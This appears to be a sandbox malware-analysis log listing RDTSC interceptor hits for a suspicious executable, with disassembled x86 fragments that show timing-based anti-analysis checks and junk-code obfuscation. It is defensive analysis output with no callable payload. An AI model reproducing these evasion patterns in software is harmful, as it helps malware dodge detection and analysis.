                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1084988 second address: 108498C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A9F second address: 1083AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083AA3 second address: 1083AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1086982 second address: 1086986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087A8B second address: 1087A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1088B12 second address: 1088BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jne 00007F6644F246E6h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F6644F246E8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov bh, dh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F6644F246E8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a pushad 0x0000004b movzx eax, ax 0x0000004e mov dword ptr [ebp+122D217Ah], edx 0x00000054 popad 0x00000055 adc ebx, 118443FAh 0x0000005b xchg eax, esi 0x0000005c jmp 00007F6644F246F9h 0x00000061 push eax 0x00000062 pushad 0x00000063 pushad 0x00000064 pushad 0x00000065 popad 0x00000066 push eax 0x00000067 pop eax 0x00000068 popad 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087CDC second address: 1087CF8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F664452DADBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1086B7C second address: 1086B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087CF8 second address: 1087CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087CFD second address: 1087D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087D03 second address: 1087D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1086B82 second address: 1086C22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnl 00007F6644F246F8h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F6644F246E8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push dword ptr fs:[00000000h] 0x00000031 sub dword ptr [ebp+122D264Eh], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F6644F246E8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 mov ebx, 3A1B75F5h 0x0000005d adc di, E1A0h 0x00000062 mov eax, dword ptr [ebp+122D0C75h] 0x00000068 add dword ptr [ebp+122D1A1Ch], eax 0x0000006e push FFFFFFFFh 0x00000070 mov edi, edx 0x00000072 nop 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jbe 00007F6644F246E6h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087D07 second address: 1087D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D317Dh], ebx 0x00000012 js 00007F664452DADAh 0x00000018 mov bx, E1D9h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov edi, dword ptr [ebp+122D1B66h] 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 pushad 0x00000031 or eax, dword ptr [ebp+122D281Ch] 0x00000037 jp 00007F664452DADCh 0x0000003d popad 0x0000003e mov eax, dword ptr [ebp+122D0FB5h] 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F664452DAD8h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e movzx edi, di 0x00000061 push FFFFFFFFh 0x00000063 mov bx, 5742h 0x00000067 nop 0x00000068 je 00007F664452DAE2h 0x0000006e jne 00007F664452DADCh 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push esi 0x00000078 push edx 0x00000079 pop edx 0x0000007a pop esi 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1089B05 second address: 1089B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F6644F246E8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 xor ebx, dword ptr [ebp+122D2542h] 0x00000026 push 00000000h 0x00000028 cmc 0x00000029 or bx, 375Fh 0x0000002e push 00000000h 0x00000030 jmp 00007F6644F246EBh 0x00000035 xchg eax, esi 0x00000036 jmp 00007F6644F246F4h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e js 00007F6644F246E8h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1088D0A second address: 1088D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1088D0E second address: 1088D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1088D23 second address: 1088D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108AB45 second address: 108AB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6644F246E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108AB4F second address: 108AB64 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108CD2C second address: 108CD3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108CD3D second address: 108CD43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108CD43 second address: 108CDF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F6644F246E8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sbb bh, 00000071h 0x00000026 pushad 0x00000027 sub di, 9B64h 0x0000002c mov bl, ch 0x0000002e popad 0x0000002f push 00000000h 0x00000031 jmp 00007F6644F246F9h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F6644F246E8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 add edi, 5AFAD7B1h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a jmp 00007F6644F246F1h 0x0000005f pop eax 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F6644F246F9h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108CF03 second address: 108CF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1093DF9 second address: 1093DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1093DFF second address: 1093E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1098D42 second address: 1098D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1098D46 second address: 1098D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F664452DADAh 0x0000000e jnp 00007F664452DAD6h 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1098D66 second address: 1098D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6644F246E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1098D70 second address: 1098D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1098D8C second address: 1098DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6644F246ECh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1098848 second address: 1098888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DAE0h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F664452DAE7h 0x00000013 jmp 00007F664452DADEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1098888 second address: 1098897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6644F246EAh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 109CE54 second address: 109CE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F664452DAD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 109CE5E second address: 109CE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 109D042 second address: 109D048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 109D048 second address: 109D04C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A2C38 second address: 10A2C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A2A28 second address: 10A2A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A2A2C second address: 10A2A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A2A4C second address: 10A2AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6644F246E6h 0x0000000a js 00007F6644F246E6h 0x00000010 ja 00007F6644F246E6h 0x00000016 popad 0x00000017 jmp 00007F6644F246EBh 0x0000001c jmp 00007F6644F246F2h 0x00000021 popad 0x00000022 push edx 0x00000023 push edi 0x00000024 push edx 0x00000025 pop edx 0x00000026 js 00007F6644F246E6h 0x0000002c pop edi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F6644F246F9h 0x00000034 push edi 0x00000035 pop edi 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A2AA9 second address: 10A2AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A7FEB second address: 10A8007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A8007 second address: 10A8018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 je 00007F664452DAD6h 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A8018 second address: 10A804A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6644F246E6h 0x0000000a jnc 00007F6644F246E6h 0x00000010 popad 0x00000011 js 00007F6644F246EAh 0x00000017 push edx 0x00000018 pop edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F6644F246F0h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A804A second address: 10A804F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A6EB3 second address: 10A6EBD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6644F246E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10703E7 second address: 1070402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070402 second address: 1070406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070406 second address: 1056011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F664452DAD8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jmp 00007F664452DADDh 0x0000002a mov edi, 1236B2E6h 0x0000002f lea eax, dword ptr [ebp+1248C1D7h] 0x00000035 mov edi, edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c push esi 0x0000003d pop esi 0x0000003e popad 0x0000003f pop edx 0x00000040 mov dword ptr [esp], eax 0x00000043 sub dword ptr [ebp+122D2654h], esi 0x00000049 call dword ptr [ebp+122D3B41h] 0x0000004f pushad 0x00000050 push eax 0x00000051 pushad 0x00000052 popad 0x00000053 pushad 0x00000054 popad 0x00000055 pop eax 0x00000056 jl 00007F664452DAD8h 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070BCF second address: 1070BDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070BDD second address: 1070BE3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070BE3 second address: 1070BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070BFC second address: 1070C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070C44 second address: 1070C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1070F7B second address: 1070F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071354 second address: 1071358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071802 second address: 107186B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F664452DADBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F664452DAD8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov cl, F1h 0x0000002c lea eax, dword ptr [ebp+1248C1D7h] 0x00000032 mov ecx, eax 0x00000034 nop 0x00000035 push edi 0x00000036 push eax 0x00000037 jns 00007F664452DAD6h 0x0000003d pop eax 0x0000003e pop edi 0x0000003f push eax 0x00000040 pushad 0x00000041 push edx 0x00000042 jmp 00007F664452DAE2h 0x00000047 pop edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jne 00007F664452DAD6h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107186B second address: 107186F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A78F0 second address: 10A7926 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F664452DAD6h 0x00000008 jmp 00007F664452DAE8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jp 00007F664452DAD6h 0x00000019 jnc 00007F664452DAD6h 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10A7926 second address: 10A792B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10AC528 second address: 10AC53E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F664452DAD6h 0x00000008 jmp 00007F664452DADCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10ACC0C second address: 10ACC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10ACC10 second address: 10ACC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DAE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10AC237 second address: 10AC23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10ACF2F second address: 10ACF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10AD200 second address: 10AD206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10AD206 second address: 10AD20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10AD20C second address: 10AD221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6644F246EDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B3D04 second address: 10B3D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B2CA4 second address: 10B2CD0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6644F246FAh 0x00000008 push esi 0x00000009 jmp 00007F6644F246EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B2DE7 second address: 10B2DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B2F3D second address: 10B2F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F6644F24705h 0x0000000c jmp 00007F6644F246F0h 0x00000011 jmp 00007F6644F246EFh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007F6644F246E6h 0x0000001f jmp 00007F6644F246F7h 0x00000024 popad 0x00000025 popad 0x00000026 push edi 0x00000027 pushad 0x00000028 push edi 0x00000029 pop edi 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B30BC second address: 10B30DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F664452DADDh 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007F664452DAD8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B30DC second address: 10B30E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
